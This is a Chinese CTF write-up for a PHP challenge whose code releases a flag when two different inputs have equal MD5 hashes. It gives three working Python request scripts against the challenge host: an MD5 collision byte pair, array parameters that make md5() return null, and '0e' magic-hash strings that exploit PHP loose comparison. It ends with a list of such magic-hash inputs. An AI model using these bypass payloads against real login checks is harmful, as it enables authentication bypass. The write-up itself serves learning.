题目链接
页面内容   明显要求name和password不同但md5哈希相同
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 
 | <?php highlight_file(__FILE__);
 include 'flag2.php';
 
 if (isset($_GET['name']) && isset($_POST['password'])){
 $name = $_GET['name'];
 $password = $_POST['password'];
 if ($name != $password && md5($name) == md5($password)){
 echo $flag;
 }
 else {
 echo "wrong!";
 }
 
 }
 else {
 echo 'wrong!';
 }
 ?>
 
 | 
1.寻找哈希碰撞
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 
 | import requests
 get_data = {
 "name": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
 b'\xfe\x34\x04\xcf\x03\x65\x9e\x70\x4f\x85\x34\xc0\x0f\xfb'
 b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
 b'\x15\x5c\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
 b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
 post_data = {
 "password": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
 b'\xfe\x34\x04\xcf\x03\x65\x9e\x74\x4f\x85\x34\xc0\x0f\xfb'
 b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
 b'\x15\xdc\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
 b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
 response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
 print(response.text)
 
 | 
2.传数组,md5处理数组都返回null
| 12
 3
 4
 5
 6
 
 | import requests
 get_data = { "name[]": 1}
 post_data = { "password[]": 2}
 response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
 print(response.text)
 
 | 
3.都传0e开头的数字,传参时默认变为0,md5结果相同且==为弱比较
| 12
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 
 | import requests
 get_data = { "name": "s878926199a"}
 post_data = { "password": "s214587387a"}
 response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
 print(response.text)
 
 '''
 s878926199a
 0e545993274517709034328855841020
 s155964671a
 0e342768416822451524974117254469
 s214587387a
 0e848240448830537924465865611904
 s214587387a
 0e848240448830537924465865611904
 s878926199a
 0e545993274517709034328855841020
 s1091221200a
 0e940624217856561557816327384675
 s1885207154a
 0e509367213418206700842008763514
 s1502113478a
 0e861580163291561247404381396064
 s1885207154a
 0e509367213418206700842008763514
 s1836677006a
 0e481036490867661113260034900752
 s155964671a
 0e342768416822451524974117254469
 s1184209335a
 0e072485820392773389523109082030
 s1665632922a
 0e731198061491163073197128363787
 s1502113478a
 0e861580163291561247404381396064
 s1836677006a
 0e481036490867661113260034900752
 s1091221200a
 0e940624217856561557816327384675
 s155964671a
 0e342768416822451524974117254469
 s1502113478a
 0e861580163291561247404381396064
 s155964671a
 0e342768416822451524974117254469
 s1665632922a
 0e731198061491163073197128363787
 s155964671a
 0e342768416822451524974117254469
 s1091221200a
 0e940624217856561557816327384675
 s1836677006a
 0e481036490867661113260034900752
 s1885207154a
 0e509367213418206700842008763514
 s532378020a
 0e220463095855511507588041205815
 s878926199a
 0e545993274517709034328855841020
 s1091221200a
 0e940624217856561557816327384675
 s214587387a
 0e848240448830537924465865611904
 s1502113478a
 0e861580163291561247404381396064
 s1091221200a
 0e940624217856561557816327384675
 s1665632922a
 0e731198061491163073197128363787
 s1885207154a
 0e509367213418206700842008763514
 s1836677006a
 0e481036490867661113260034900752
 s1665632922a
 0e731198061491163073197128363787
 s878926199a
 0e545993274517709034328855841020
 240610708
 0e462097431906509019562988736854
 314282422
 '''
 
 |